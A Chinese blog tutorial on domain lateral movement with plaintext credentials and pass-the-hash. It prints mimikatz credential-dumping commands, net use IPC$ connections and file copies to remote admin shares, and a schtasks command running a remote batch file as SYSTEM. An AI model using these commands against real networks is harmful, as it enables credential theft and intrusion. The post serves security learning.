域渗透之明文传递&hash传递

已于 2024-05-17 09:44:08 修改
阅读量371 收藏 4
点赞数 5
分类专栏: 内网渗透 文章标签: 网络安全
于 2024-05-16 16:36:26 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_55202378/article/details/138961095
版权

文章目录

一、明文传递

在拿下一台内网主机后,通过本地信息搜集收集用户凭证等信息后,如何横向渗透拿下更多的主机?这里提供一条思路:在已知目标系统的用户明文密码的基础上,直接可以在远程主机上执行命令。获取到某域主机权限;mimikatz得到密码(明文、hash);用信息收集域用户的列表当作用户名字典;用密码明文当作密码字典;尝试连接;创建计划任务(at | schtasks);执行文件可为后门或相关命令。

mimikaze抓取windows用户名、密码

# mimikatz 查看windows密码
privilege::debug
sekurlsa::logonpasswords

在这里插入图片描述

net use # 显示当前IPC连接。net use管理网络共享连接,它允许用户连接到共享文件夹或打印机,并断开与这些资源的连接。
net use \\192.168.1.1\ipc$ "<password>" /user:<username> # 与工作组内的机器建立网络连接
net use \\192.168.1.1\ipc$ "<password>" /user:domain\<username> # 与域内的机器建立网络连接
dir \\192.168.1.1\c$\ # 查看192.168.1.1 C盘下的文件列表
copy \\192.168.1.1\c$\1.bat 1.bat # 将192.168.1.1 C盘下的1.bat复制到当前目录下,且文件名为1.bat
copy file.exe \\192.168.1.1\c$\file.exe # 将当前目录下的file.exe复制到192.168.1.1 C盘目录下的,且文件名为file.exe 
del \\192.168.1.1\c$\1.msi # 删除192.168.1.1 C盘下的1.msi文件
net use \\192.168.1.1\c$ /delete # 删除IPC连接
net view 192.168.1.1 # 查看192.168.1.1的共享文件夹

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
建立IPC常见的错误代码

  • 错误号5:拒绝访问,权限不够;
  • 错误号51:无法找到网络路径(网络有问题);
  • 错误号53:找不到网络路径(ip地址错误:目标主机未开机;目标主机lanmanserver服务未启动;目标主机防火墙设置过滤端口);
  • 错误号67:找不到网络名(本地主机中lanmanstation服务未启动或者目标主机删除ipc$);
  • 错误号1219:提供的凭据与已存在的凭据集冲突(已经建立了一个ipc$,可以删除再连);
  • 错误号1326:用户名或密码错误;
  • 错误号1792:试图登录,网络登录服务未启动(目标主机中NetLogon服务未启动);
  • 错误号2242:该用户的密码已过期。

建立IP失败的原因:

  • 目标系统不是NT或以上的操作系统;
  • 对方没有打开IPC$共享;
  • 对方未开启139、445端口,或者被防火墙屏蔽;

at主要用于windows server 2012以下版本,schtasks主要用于大于等于windows server 2012版本的环境。
在这里插入图片描述

schtasks /create /s 192.168.1.1 /ru "SYSTEM" /tn "test" /tr c:\1.bat /sc once /st 20:00
# schtasks:这是一个用于管理计划任务的命令行工具。
# /create:这是一个指示创建计划任务的参数。
# /s 192.168.1.1:远程主机192.168.1.1.
# /ru "SYSTEM":以system身份进行运行。
# /tn "test":这是指定要创建的任务的名称,这里将任务名称设置为 "test"。
# /tr c:\1.bat:这是指定要运行的任务的路径和文件名,这里是 "c:\1.bat"。
# /sc once:这是指定任务的计划安排,这里是一次性执行任务。
# /st 20:00:这是指定任务的开始时间,这里是在晚上 20:00 开始执行任务。

在这里插入图片描述

批量建立IPC连接

pyinstaller -F xxx.py # 生成可执行exe文件

二、hash传递

NTLM破解
在线破解网站:cmd5、ophcracck
离线破解工具:hashcat(windows)、john the ripper(linux)

impacket,基于at,既支持明文传递,也支持hash传递。
在这里插入图片描述
在这里插入图片描述

这里要执行两次。

在这里插入图片描述
hash传递
在这里插入图片描述
hash传递思路
在这里插入图片描述

三、Procdump+mimikatz配合获取密码

procdump需要管理员权限。
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

PT_silver
关注
  • 5
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
AD渗透 | PTH&PTK哈希传递攻击手法
m0_57221101的博客
04-13 1133
AD渗透的第二篇,托更一下Kerberos协议的分析文章,等到攻击手法研究明白了,再把协议分析放上来,防止像那些理解不明不白的人写的东西一样祸害人。 发生情况 在高版本的windows server下账号密码不再以明文的方式保存,转而以hash的形式储存,但是假如我们在攻击的时候抓取到了用户hash也可以直接用hash来直接通过验证,模拟用户登录 原理 由于验证原理的问题密码是在本地计算成hash,然后使用hash加密时间戳作为pre-Authention-data来上传,因此如果我们使用自己的脚
内网渗透-横向smb&wmin明文hash传递
weixin_60329395的博客
08-09 1709
该工具可配合minikatz进行明文获取,minikatz被查杀的情况下可使用tips:该工具为微软官方工具,不会被查杀Procdump下载地址:https://docs.microsoft.com/zh-cn/sysinternals/downloads/procdump下载成功后 导入到目标主机 使用CMD命令进行以下命令进行执行即使用该工具生成一个该主机的密码文件 执行成功,自动生成了一个lsass.dmp的文件 将该dmp文件放到自己本机上使用minikatz进行执行tips:将dmp文件放进min
渗透之smb进行明文hash传递
qq_55202378的博客
05-17 194
打了补丁,关了明文密码显示之后,更改当前cmd使用的编码格式。准报错,不支持hash。显示乱码的话,需要使用。就抓不到明文密码了。
内网安全-横向smb&wmi明文hash传递
xhscxj的博客
03-11 3710
知识点1: Windows2012以上版本默认关闭wdigest,攻击者无法从内存中获取明文密码 Windows2012以下版本如安装KB2871997补丁,同样也会导致无法获取明文密码 针对以上情况,我们提供了4种方式解决此类问题 1.利用哈希hash传递(path,ptk等)进行移动 2.利用其他服务协议(SMB,WMI等)进行哈希移动 3.利用注册表操作开启Wdigest Auth值进行获取 4.利用工具或第三方平台(Hachcat)进行破解获取 ...
渗透Hash传递攻击
weixin_65550121的博客
12-08 919
哈希传递(pth)攻击是指攻击者可以通过捕获密码的hash值(对应着密码的值),然后简单地将其传递来进行身份验证,以此来横向访问其他网络系统。攻击者无须通过解密hash值来获取明文密码。因为对于每个Session hash值都是固定的,除非密码被修改了(需要刷新缓存才能生效),所以pth可以利用身份验证协议来进行攻击。攻击者通常通过抓取系统的活动内存和其他技术来获取哈希。虽然哈希传递攻击可以在Linux,Unix和其他平台上发生,但它们在windows系统上最普遍。
【内网渗透横向smb&wmi明文hash传递
ssrf
03-07 1353
目录0x001 Procdump+Mimikatz配合获取用户信息0x002 无法获取明文密码解决方案1)hashcat暴力破解2)注册表操作开启Wdigest Auth值3)SMB服务协议进行哈希移动4)WMI服务利用-cscript,wmiexec,wmic 0x001 Procdump+Mimikatz配合获取用户信息 Mimikatz属于第三方软件,直接上传到目标主机可能被杀毒软件查杀,这时我们可以配合官方软件Procdump,将Procdump上传目标主机获取用户信息(该文件不可读),使用本地
第67天-内网安全-横向smb&wmi明文hash传递
MCTSOG的博客
05-12 958
思维导图 知识点 无法获取明文密码: Windows2012以上版本默认关闭wdigest,攻击者无法从内存中获取明文密码 Windows2012以下版本若安装KB2871997补丁,同样也会导致无法获取明文密码 针对以上情况,我们提供了4种方式解决此类问题 1.利用哈希hash传递(pth,ptk等)进行移动 2.利用其它服务协议(SMB,WMI等)进行哈希移动 3.利用注册表操作开启Wdigest Auth值进行获取 注册表操作开启Wdigest Auth值 reg add HKL
内网渗透 - 哈希传递攻击
LuckySec
06-06 2333
在内网渗透过程中,当获取到某个管理员用户的密码 hash 值却无法解密时,可以通过哈希传递攻击(Pass The Hash)对内网其他机器进行横向渗透。哈希传递攻击(Pass The Hash)是基于 NTLM 认证缺陷的一种攻击方式,攻击者可以利用用户的密码哈希值来进行 NTLM 认证。在环境中,大量计算机在安装时会使用相同的本地管理员账号和密码。如果计算机的本地管理员账号密码相同,攻击者就能使用哈希传递攻击的手段登录到内网中的其他计算机。通过哈希传递攻击,攻击者不需要花时间破解密码哈希值来获取明文密码
【内网渗透横向RDP传递&Kerberoast攻击
ssrf
03-09 568
目录0x001 RDP协议传递0x002 Kerberoast攻击1)探针服务2)请求获取票据3)导出票据4)破解票据5)重写票据6)利用 0x001 RDP协议传递 除了之前的IPC,WMI,SMB等协议的链接外,获取到的明文密码或HASH密文也可以通过RDP协议进行链接操作。 RDP协议连接:判断对方远程桌面服务是否开启(默认:3389),端口扫描判断 RDP明文密码链接 windows: mstsc mstsc.exe /console /v:192.168.3.21 /admin linux:
渗透——PassTheHash&PassTheKey
02-26
对于PassTheHash大家应该都很熟悉,在2014年5月发生了...在渗透中,Hash和Key尤为重要,对其获取和利用一直是攻防双方最主要的关注点,所以本次就从hash和key开始。控:内主机:在上篇LAPS中提到,如果内网主机的
渗透完全技巧.pdf
10-03
卷影拷贝(获取控所有hash) dpapi解密 2.内网信息收集 本机信息收集 8.获取当前用户密码 Windows Linux 浏览器 Navicat密码 xshell&xftp密码 mRemoteNG密码 扩散信息收集 常用端口扫描工具 内网拓扑架构分析 常见...
第68天:内网安全-横向PTH&PTK&PTT哈希票据传递1
08-03
内网安全是一个重要的议题,尤其是在企业环境中,横向PTH、PTK、PTT哈希票据传递是其中的关键攻击手段。这些方法主要针对Kerberos协议的弱点,利用NTLM哈希、Kerberos票据和AES密钥来绕过认证过程,从而在内部网络...
海量数据解决思路之Hash算法
01-30
本文将粗略讲述一下Hash算法的概念特性,里边会结合分布式系统负载均衡实例对Hash的一致性做深入探讨。另外,探讨一下Hash算法在海量数据处理方案中的通用性。最后,从源代码出发,具体分析一下Hash算法在MapReduce...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8295
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
ChatGPT原理1-3
06-20
ChatGPT原理1-3
aiohttp-3.4.0b2.tar.gz
最新发布
06-20
Python库是一组预先编写的代码模块,旨在帮助开发者实现特定的编程任务,无需从零开始编写代码。这些库可以包括各种功能,如数学运算、文件操作、数据分析和网络编程等。Python社区提供了大量的第三方库,如NumPy、Pandas和Requests,极大地丰富了Python的应用领,从数据科学到Web开发。Python库的丰富性是Python成为最受欢迎的编程语言之一的关键原因之一。这些库不仅为初学者提供了快速入门的途径,而且为经验丰富的开发者提供了强大的工具,以高效率、高质量地完成复杂任务。例如,Matplotlib和Seaborn库在数据可视化领内非常受欢迎,它们提供了广泛的工具和技术,可以创建高度定制化的图表和图形,帮助数据科学家和分析师在数据探索和结果展示中更有效地传达信息。
小程序版通过CNN训练识别印刷体数字和字母-不含数据集图片-含逐行注释和说明文档.zip
06-20
本代码是基于python pytorch环境安装的。 总共是3个py文件,十分的简便 且代码里面的每一行都是含有中文注释的,小白也能看懂代码 然后是关于数据集的介绍。 本代码是不含数据集图片的,下载本代码后需要自行搜集图片放到对应的文件夹下即可 在数据集文件夹下是我们的各个类别,这个类别不是固定的,可自行创建文件夹增加分类数据集 需要我们往每个文件夹下搜集来图片放到对应文件夹下,每个对应的文件夹里面也有一张提示图,提示图片放的位置 然后我们需要将搜集来的图片,直接放到对应的文件夹下,就可以对代码进行训练了。 运行01数据集文本生成制作.py,是将数据集文件夹下的图片路径和对应的标签生成txt格式,划分了训练集和验证集。 运行02深度学习模型训练.py就会将txt文本中记录的训练集和验证集进行读取训练,训练好后会保存模型在本地。训练完成之后会有log日志保存本地,里面记录了每个epoch的验证集损失值和准确率。 运行03flask_服务端.py就可以生成与小程序交互的url了 然后需要我们运行微信开发者工具,如果之前没有下载过,则需要在电脑网页上,搜微信开发者工具进行下载。 导入我们的小
AI+智慧校园建设方案PPT(100页).pptx
06-20
智慧校园大数据信息化AIOT平台建设整体解决方案是一个综合性的校园智能化升级计划,旨在通过应用物联网、大数据、人工智能等高新技术,打造一个安全、便捷、绿色的校园环境。该方案遵循国家教育信息化2.0规划和相关标准,强调技术在教育领的深度应用。 方案的核心内容包括全场景的智能互联、物信融合、AI赋能创新应用,以及校园营运指挥中心的建设。它涵盖了智慧管理、智慧服务、智慧教学等多个方面,通过SAAS、PAAS、DAAS、IAAS等多层次的系统架构,实现从数据存储、管理到智能分析和应用的全面覆盖。 智慧应用聚焦于校园特色场景,如教室、宿舍、图书馆和食堂,通过AI视频智能分析技术,提供便捷服务。方案还包括智能安防、智慧消防、能耗监管等,以实现校园的智能化管理。例如,人脸门禁系统提供无感通行,提高安全性和便捷性;车辆管理系统通过轨迹分析和布控,优化交通秩序。 此外,方案还强调了智能照明、智能水控和电控等节能环保措施,以及通过智能语音分析和录播方案提升教学质量。智慧宿舍通过人脸宿管和智能节电,提高宿舍管理效率。整体上,该方案通过技术集成和创新,推动校园向智能化、信息化转型,为师生创造更安全、便捷、环保的学习和生活环境。
&hash_table指向的内存区不是hash_table吗
06-08
`&hash_table` 指向的内存区就是 `hash_table` 指针所指向的整个 `my_struct` 结构体,即 Hash 表结构体,而不是仅仅指向 `hash_table` 指针本身。因此,使用 `memcpy(shared_hash_table, &hash_table, sizeof(my_...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值